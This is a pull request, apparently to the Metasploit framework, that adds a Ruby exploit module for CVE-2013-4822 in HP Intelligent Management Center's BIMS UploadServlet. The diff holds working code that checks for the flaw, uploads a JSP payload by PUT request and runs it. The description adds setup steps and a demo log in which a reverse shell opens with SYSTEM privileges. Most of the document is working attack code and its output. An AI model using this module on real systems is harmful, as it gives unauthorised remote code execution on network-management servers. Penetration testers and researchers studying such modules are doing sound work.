### PR TITLE
Add module for ZDI-13-238

### DIFF
--- a/modules/exploits/windows/http/hp_imc_bims_upload.rb
+++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'        => ARCH_JAVA,
       'Targets'     =>
         [
-          [ 'HP Intelligent Management Center 5.2 E0401 / BIMS 5.2 E0401 / Windows', { } ]
+          [ 'HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows', { } ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Oct 08 2013'))
@@ -62,6 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
       return Exploit::CheckCode::Vulnerable
+    elsif res and res.code == 405 and res.message =~ /Method Not Allowed/
+      return Exploit::CheckCode::Appears
     end
 
     return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/http/hp_imc_bims_upload.rb
+++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb
@@ -17,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'        => 'HP Intelligent Management Center BIMS UploadServlet Directory Traversal',
       'Description' => %q{
-          This module exploits a directory traversal vulnerability on the version 5.1 of the BIMS
+          This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS
         component from the HP Intelligent Management Center. The vulnerability exists in the
         UploadServlet, allowing the user to download and upload arbitrary files. This module has
-        been tested successfully on HP Intelligent Management Center with BIMS 5.1 E0202 on Windows
+        been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows
         2003 SP2.
       },
       'Author'       =>
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'        => ARCH_JAVA,
       'Targets'     =>
         [
-          [ 'HP Intelligent Management Center 5.1 E0202 / BIMS 5.1 E0202 / Windows', { } ]
+          [ 'HP Intelligent Management Center 5.2 E0401 / BIMS 5.2 E0401 / Windows', { } ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Oct 08 2013'))

--- a/modules/exploits/windows/http/hp_imc_bims_upload.rb
+++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'HP Intelligent Management Center BIMS UploadServlet Directory Traversal',
+      'Description' => %q{
+          This module exploits a directory traversal vulnerability on the version 5.1 of the BIMS
+        component from the HP Intelligent Management Center. The vulnerability exists in the
+        UploadServlet, allowing the user to download and upload arbitrary files. This module has
+        been tested successfully on HP Intelligent Management Center with BIMS 5.1 E0202 on Windows
+        2003 SP2.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-4822' ],
+          [ 'OSVDB', '98247' ],
+          [ 'BID', '' ],
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-238/' ],
+          [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'HP Intelligent Management Center 5.1 E0202 / BIMS 5.1 E0202 / Windows', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Oct 08 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(8080)
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'    => normalize_uri("/", "upload", "upload"),
+      'method' => 'GET',
+      'vars_get' => { 'fileName' => "WEB-INF/web.xml" },
+    })
+
+    if res and res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    # New lines are handled on the vuln app and payload is corrupted
+    #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
+    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+
+    print_status("#{peer} - Uploading the JSP payload...")
+    res = send_request_cgi({
+      'uri'    => normalize_uri("/", "upload", "upload"),
+      'method' => 'PUT',
+      'vars_get' => { 'fileName' => jsp_name },
+      'data' => payload.encoded
+    })
+
+    if  res and res.code == 200 and res.body.empty?
+      print_status("#{peer} - JSP payload uploaded successfully")
+      register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
+    end
+
+    print_status("#{peer} - Executing payload...")
+    send_request_cgi({
+      'uri'    => normalize_uri("/", "upload", jsp_name),
+      'method' => 'GET'
+    }, 1)
+
+  end
+
+end

--- a/modules/exploits/windows/http/hp_imc_bims_upload.rb
+++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'CVE', '2013-4822' ],
           [ 'OSVDB', '98247' ],
-          [ 'BID', '' ],
+          [ 'BID', '62895' ],
           [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-238/' ],
           [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425' ]
         ],


### PR DESCRIPTION
HP Intelligent Management Center with BIMS 5.2 E0401 on Windows 2003 SP2.

**Validation**
- [ ] download HP IMC 5.2 E0401 trial from http://h17007.www1.hp.com/us/en/networking/products/network-management/IMC_ES_Platform/index.aspx#.UmIcvJRASaI
- [ ] download the BIMS 5.2 E0401 component from http://h17007.www1.hp.com/us/en/networking/products/network-management/IMC_BIM_Software/index.aspx#.UmIc8pRASaI
- [ ] Install both IMC nad the BIMS component
- [ ] Ensute the IMC service is running on the port 8080
- [ ] Run the msfconsole, use the module, check and exploit, you should get a session, check the demo belo

**DEMO**

```
  msf > use exploit/windows/http/hp_imc_bims_upload
smsf exploit(hp_imc_bims_upload) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(hp_imc_bims_upload) > check
[+] The target is vulnerable.
msf exploit(hp_imc_bims_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.136:8080 - Uploading the JSP payload...
[*] 192.168.172.136:8080 - JSP payload uploaded successfully
[*] 192.168.172.136:8080 - Executing payload...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.136:3875) at 2013-10-19 00:06:01 -0500
[+] Deleted ..\web\apps\upload\vmU4G4OQIwm8.jsp

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\iMC\client\bin>echo 3372204887;echo cYrFRdPCeLbuzRHnAGPpDBtyinYCnJYE
3372204887;echo cYrFRdPCeLbuzRHnAGPpDBtyinYCnJYE

C:\Program Files\iMC\client\bin>attrib.exe -r "..\web\apps\upload\vmU4G4OQIwm8.jsp" ; del.exe /f /q "..\web\apps\upload\vmU4G4OQIwm8.jsp" ; rm -f "..\web\apps\upload\vmU4G4OQIwm8.jsp" >/dev/null;echo KzqGldxkdRKDPeYySFaIleGyGLkIwkNX

C:\Program Files\iMC\client\bin>whoami
whoami
nt authority\system

C:\Program Files\iMC\client\bin>
```
